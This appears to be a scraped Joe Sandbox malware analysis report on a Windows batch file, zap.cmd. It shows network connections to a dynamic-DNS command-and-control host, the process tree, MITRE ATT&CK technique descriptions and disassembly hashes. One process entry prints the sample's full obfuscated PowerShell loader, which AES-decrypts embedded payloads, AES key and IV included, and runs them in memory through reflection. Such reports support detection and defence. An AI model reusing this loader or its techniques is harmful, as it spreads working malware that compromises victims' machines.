May 23, 2024 21:08:05.116432905 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:08:05.951303959 CEST	8896	49701	12.202.180.134	192.168.2.7
May 23, 2024 21:08:05.994618893 CEST	49701	8896	192.168.2.7	12.202.180.134
May 23, 2024 21:08:17.010611057 CEST	49701	8896	192.168.2.7	12.202.180.134

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 21:06:03.370284081 CEST	61771	53	192.168.2.7	1.1.1.1
May 23, 2024 21:06:03.512759924 CEST	53	61771	1.1.1.1	192.168.2.7
May 23, 2024 21:06:14.672967911 CEST	53	51320	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 21:06:03.370284081 CEST	192.168.2.7	1.1.1.1	0x7c7a	Standard query (0)	hjxwrm5.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 21:06:03.512759924 CEST	1.1.1.1	192.168.2.7	0x7c7a	No error (0)	hjxwrm5.duckdns.org		12.202.180.134	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	15:05:51
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
Imagebase:	0x7ff7624a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:05:51
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:05:51
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c \"set __=^&rem\
Imagebase:	0x7ff7624a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:05:52
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"
Imagebase:	0x7ff7624a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:05:52
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:05:52
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c \"set __=^&rem\
Imagebase:	0x7ff7624a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:05:52
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "
Imagebase:	0x7ff7624a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:05:52
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:05:54
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:31:17
Start date:	23/05/2024
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"
Imagebase:	0x7ff73e620000
File size:	229'728 bytes
MD5 hash:	74A0194782E039ACE1F7349544DC1CF4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAACCACBFB Relevance: 9.5, Strings: 7, Instructions: 770
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6p, xrefs: 00007FFAACCACF53
x6p, xrefs: 00007FFAACCACE1A
VO_H, xrefs: 00007FFAACCACE6D
x6p, xrefs: 00007FFAACCACD20
6p, xrefs: 00007FFAACCACF38
x6p, xrefs: 00007FFAACCACE75
x6p, xrefs: 00007FFAACCACDA0

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: VO_H$x6p$x6p$x6p$x6p$6p$6p
API String ID: 0-102663581
Opcode ID: f4837f039bbf4f921d848a80520ecf3c69c4ac2ece0fc369c538c3f73d6e5f84
Instruction ID: fa7da865e6dc6897805f5b9ea608fae16ba8ade8df7ad40e6d92fb2ccca9a374
Opcode Fuzzy Hash: f4837f039bbf4f921d848a80520ecf3c69c4ac2ece0fc369c538c3f73d6e5f84
Instruction Fuzzy Hash: BD3219B1A1DB4A8FF789DB2C84197B577D2EF96300F1481BAD44EC7292DE24DC468381

Function 00007FFAACCAD8F9 Relevance: 1.7, APIs: 1, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9c311fc2fec801ef434059579c5dfb04b55f4030e389d3699fa9b7bcc2af7a
Instruction ID: d2375fe4e8e01642789e7963c80c1d136979a47f9fa59f6f77e3f632008df30c
Opcode Fuzzy Hash: 2e9c311fc2fec801ef434059579c5dfb04b55f4030e389d3699fa9b7bcc2af7a
Instruction Fuzzy Hash: F261E37190CA498FE758DF6C885ABB97BE1FF99710F04427EE04DD7292DF24A8068781

Function 00007FFAACCA45DA Relevance: 1.6, APIs: 1, Instructions: 130
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFAACCADACE

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8e05fbc96401cc01e91bb16e67e560d4232149ce65d9bfc6eb6c544648463431
Instruction ID: 9f23bbf07dd65342998d903d428b405452728bdbc8605ea614832ea77236bc96
Opcode Fuzzy Hash: 8e05fbc96401cc01e91bb16e67e560d4232149ce65d9bfc6eb6c544648463431
Instruction Fuzzy Hash: 9131827191CA1C9FDB58EF58D849AF977E0FB69721F00422EE04EE3251CB71A8468BC5

Function 00007FFAACCA45EA Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE ref: 00007FFAACCEFCB5

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 540d9cff6a46fb0e056bb296a8de2e5d624efe9aadb28b638b37cb4a57a538fb
Instruction ID: de2fe7ccb7143f898b9c5966603045070f2671db52421cad03fcce047b8f106a
Opcode Fuzzy Hash: 540d9cff6a46fb0e056bb296a8de2e5d624efe9aadb28b638b37cb4a57a538fb
Instruction Fuzzy Hash: DF218E71908A0C9FDB58EB58C849BF9B7E0FBA9321F10422ED04ED3651DB71A816CB91

Function 00007FFAACD715DD Relevance: .5, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1280343717.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525191e0b6ee447adfa925a3358aa030b59436f4dcb45d743d80f8c20e2e3e96
Instruction ID: f480c5b11bf8493db57cbb793847bd011f6acc615cc11ef332406f1690135562
Opcode Fuzzy Hash: 525191e0b6ee447adfa925a3358aa030b59436f4dcb45d743d80f8c20e2e3e96
Instruction Fuzzy Hash: 88F10361A0EBD69FE356973858151B47FE1EF53210B4942FFD09DC71A3EA28D80A83D2

Non-executed Functions

Function 00007FFAACCBDCA0 Relevance: 3.3, Strings: 2, Instructions: 841COMMON

Download Yara Rule

Strings

0#%, xrefs: 00007FFAACCBDF25
_N_H, xrefs: 00007FFAACCBDD3F

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: 0#%$_N_H
API String ID: 0-466631255
Opcode ID: f555950a2c5343ab4b7aa8dceca617597fb1a7e9cebf3d2aba6e612b03331df9
Instruction ID: 2c0555226b3e2f1f50206a19093f929d1e133cb56f7471018b50ad3b4396dedc
Opcode Fuzzy Hash: f555950a2c5343ab4b7aa8dceca617597fb1a7e9cebf3d2aba6e612b03331df9
Instruction Fuzzy Hash: DC42CF70A18A4A8FEB94EF6CD844BB977E1FF99300F0441B9E45EC7296DE24EC458781

Function 00007FFAACCAF8D8 Relevance: 2.0, Strings: 1, Instructions: 753COMMON

Download Yara Rule

Strings

x6p, xrefs: 00007FFAACCD0DE5

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: x6p
API String ID: 0-1742612846
Opcode ID: 2ffd3a96c4717647fb9db5ca1d9e67182b2aa6948ed6675592f5a8adab2c7577
Instruction ID: 83406bf9761c6d439bc34bf434bff8bee97444086b6bab4912a92bd69b1f5894
Opcode Fuzzy Hash: 2ffd3a96c4717647fb9db5ca1d9e67182b2aa6948ed6675592f5a8adab2c7577
Instruction Fuzzy Hash: 3922E460A1DA469BF759AB2C94567B973D2FF89310F54817EE04EC36C3DE28E80687C1

Function 00007FFAACCA7CA0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFAACCAC594

Memory Dump Source

Source File: 00000009.00000002.1279633526.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 742bfbbb8dbd02339a4b8ae1734e4b478ba5e4e20b7210dd330aba4a11943df4
Instruction ID: b26a57cbfb2cdfba2d7b7cfc3d9d5f2eac1e21a908dc7552a69bda91fad4c22a
Opcode Fuzzy Hash: 742bfbbb8dbd02339a4b8ae1734e4b478ba5e4e20b7210dd330aba4a11943df4
Instruction Fuzzy Hash: 68122171A1DA4A8FE329DF28C4495B1B7E2FF56710B1486B9C09FC3592DE26F80687C0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zap.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_314e1f70-3e91-4a95-b30f-9d6ce19559ac\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1056.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1096.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1bzk0n.pwe.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scwnrxj.flu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg0slv3m.sqh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg1oghzr.2er.ps1

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Windows Analysis Report
zap.cmd

Function 00007FFAACCACBFB Relevance: 9.5, Strings: 7, Instructions: 770
COMMON

Function 00007FFAACCAD8F9 Relevance: 1.7, APIs: 1, Instructions: 232
COMMON

Function 00007FFAACCA45DA Relevance: 1.6, APIs: 1, Instructions: 130
fileCOMMON

Function 00007FFAACCA45EA Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Function 00007FFAACD715DD Relevance: .5, Instructions: 527
COMMON